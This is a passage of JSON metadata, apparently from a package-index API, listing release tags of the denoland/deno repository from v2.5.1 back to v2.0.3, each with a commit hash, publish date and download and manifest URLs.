eases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0